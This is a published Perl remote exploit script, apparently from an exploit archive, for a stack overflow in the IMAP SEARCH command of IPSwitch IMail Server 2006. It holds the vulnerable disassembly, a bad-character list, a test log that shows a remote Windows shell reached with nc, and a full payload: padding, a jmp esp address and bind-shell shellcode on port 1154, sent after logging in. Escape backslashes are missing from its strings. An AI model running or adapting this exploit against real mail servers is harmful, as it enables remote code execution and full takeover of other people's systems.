IPSwitch IMail Server 2006 SEARCH Remote Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IPSwitch IMail Server 2006 SEARCH Remote Stack Overflow Exploit
# Published : 2007-07-25
# Author : ZhenHan.Liu
# Previous Title : Nessus Vulnerability Scanner 3.0.6 ActiveX Remote Delete File Exploit
# Next Title : Clever Internet ActiveX Suite 6.2 Arbitrary File Download/Overwrite
#!/use/bin/perl
#
# Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit
# Author: ZhenHan.Liu#ph4nt0m.org
# Date: 2007-07-25
# Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)
#
# Vuln Found by: Manuel Santamarina Suarez
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563
#
# The Vuln code is here (imap4d32.exe version 6.8.8.1)
#  00418CCA  |.  8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]
#  00418CD0  |.  0FBE11        |MOVSX EDX,BYTE PTR DS:[ECX]
#  00418CD3  |.  83FA 22       |CMP EDX,22
#  00418CD6  |.  75 2A         |JNZ SHORT IMAP4D32.00418D02
#  00418CD8  |.  8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
#  00418CDE  |.  50            |PUSH EAX                                ; /String
#  00418CDF  |.  FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>>; lstrlenA
#  00418CE5  |.  83E8 02       |SUB EAX,2
#  00418CE8  |.  50            |PUSH EAX                                ; /maxlen
#  00418CE9  |.  8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]         ; |
#  00418CEF  |.  83C1 01       |ADD ECX,1                               ; |
#  00418CF2  |.  51            |PUSH ECX                                ; |src
#  00418CF3  |.  8D55 AC       |LEA EDX,DWORD PTR SS:[EBP-54]           ; |
#  00418CF6  |.  52            |PUSH EDX                                ; |dest
#  00418CF7  |.  FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>]  ; strncpy
#  00418CFD  |.  83C4 0C       |ADD ESP,0C
#  00418D00  |.  EB 13         |JMP SHORT IMAP4D32.00418D15
#  00418D02  |>  8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
#  00418D08  |.  50            |PUSH EAX                                ; /src
#  00418D09  |.  8D4D AC       |LEA ECX,DWORD PTR SS:[EBP-54]           ; |
#  00418D0C  |.  51            |PUSH ECX                                ; |dest
#  00418D0D  |.  E8 7E610100   |CALL <JMP.&MSVCR71.strcpy>              ; strcpy
#  00418D12  |.  83C4 08       |ADD ESP,8
#  
#  The programmer has made an extreamly stupid mistake.
#  He checks the arg's first byte, if it is 0x22( " ),then invoke strcpy,
#  else strncpy.
#  the buffer overflow takes place when the strcpy is called.
#  But the strncpy is also vulnerable,because it just likes this: strncpy(dest, src, strlen(src)); 
#  So, whether the command was started with a '"' or not, the stack overflow will take place immediately.  
# 
#  Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON".
#  But others like "SEARCH BEFORE" command will also trigger the overflow.
#
#  NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!!
#
#  Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20
#
# Tested On Windows 2003 SP1 CN
#
#  D:>perl imap.pl 192.168.226.128 143
#  * OK IMAP4 Server (IMail 9.10)
#  0 OK LOGIN completed
#  * FLAGS (Answered Flagged Deleted Seen Draft)
#  * 1 EXISTS
#  * 1 RECENT
#  * OK [UIDVALIDITY 1185337300] UIDs valid
#  * OK [UIDNEXT 485337302] Predicted next UID
#  2 OK [READ-WRITE] SELECT completed
#  -------------- [BEGIN] -------------------
#  ----------------  [END]  ------------------
#  
#
#  D:>nc -vv -n 192.168.226.128 1154
#  (UNKNOWN) [192.168.226.128] 1154 (?) open
#  Microsoft Windows [?°?|?±?? 5.2.3790]
#  (C) ?°?|???¨???1?“?? 1985-2003 Microsoft Corp.
#  
#  C:WINDOWSsystem32>
#
#


use strict;
use warnings;
use IO::Socket;

#Target IP
my $host = shift ;
my $port = shift ;
my $account = "void";
my $password = "ph4nt0m.org";

my $pad1 = "void[at]ph4nt0m.org_" x 4 . "ph4nt0m";
my $pad2 = 'void[at]pstgroup';
my $jmpesp = "x12x45xfax7f"; # Windows 2000/xp/2003 Universal

# win32_bind -  EXITFUNC=thread LPORT=1154 Size=344 Encoder=Pex http://metasploit.com
my $shellcode =
"x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exb6".
"x78xf8x75x83xeexfcxe2xf4x4ax12x13x38x5ex81x07x8a".
"x49x18x73x19x92x5cx73x30x8axf3x84x70xcex79x17xfe".
"xf9x60x73x2ax96x79x13x3cx3dx4cx73x74x58x49x38xec".
"x1axfcx38x01xb1xb9x32x78xb7xbax13x81x8dx2cxdcx5d".
"xc3x9dx73x2ax92x79x13x13x3dx74xb3xfexe9x64xf9x9e".
"xb5x54x73xfcxdax5cxe4x14x75x49x23x11x3dx3bxc8xfe".
"xf6x74x73x05xaaxd5x73x35xbex26x90xfbxf8x76x14x25".
"x49xaex9ex26xd0x10xcbx47xdex0fx8bx47xe9x2cx07xa5".
"xdexb3x15x89x8dx28x07xa3xe9xf1x1dx13x37x95xf0x77".
"xe3x12xfax8ax66x10x21x7cx43xd5xafx8ax60x2bxabx26".
"xe5x2bxbbx26xf5x2bx07xa5xd0x10xfcxf7xd0x2bx71x94".
"x23x10x5cx6fxc6xbfxafx8ax60x12xe8x24xe3x87x28x1d".
"x12xd5xd6x9cxe1x87x2ex26xe3x87x28x1dx53x31x7ex3c".
"xe1x87x2ex25xe2x2cxadx8ax66xebx90x92xcfxbex81x22".
"x49xaexadx8ax66x1ex92x11xd0x10x9bx18x3fx9dx92x25".
"xefx51x34xfcx51x12xbcxfcx54x49x38x86x1cx86xbax58".
"x48x3axd4xe6x3bx02xc0xdex1dxd3x90x07x48xcbxeex8a".
"xc3x3cx07xa3xedx2fxaax24xe7x29x92x74xe7x29xadx24".
"x49xa8x90xd8x6fx7dx36x26x49xaex92x8ax49x4fx07xa5".
"x3dx2fx04xf6x72x1cx07xa3xe4x87x28x1dx59xb6x18x15".
"xe5x87x2ex8ax66x78xf8x75";


my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>$port, proto=>"tcp" ) || die "Connect error.n";

my $res = <$sock>;
print $res;
if( $res !~ /OK/ )
{
	exit(-1);
}

# login
print $sock "0 LOGIN $account $passwordrn";
print $res = <$sock>;
if( $res !~ /0 OK/ )
{
	exit(-1);
}

# select
print $sock "1 SELECT INBOXrn";
while(1)
{
	print $res = <$sock>;
	if($res =~ /1 OK/)
	{	last; }
	elsif($res =~ /1 NO/ || $res =~ /BAD/)
	{ 	exit(-1); }
	else
	{	next; }
}

# search
my $payload = $pad1.$jmpesp.$pad2.$shellcode;
print $sock "2 SEARCH ON <$payload>rn";

$sock->close();

# www.Syue.com [2007-07-25]